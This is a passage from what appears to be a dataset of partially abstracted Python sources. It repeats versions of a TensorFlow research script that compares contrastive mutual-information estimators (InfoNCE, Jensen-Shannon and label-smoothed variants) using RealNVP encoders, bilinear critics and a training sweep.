loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of 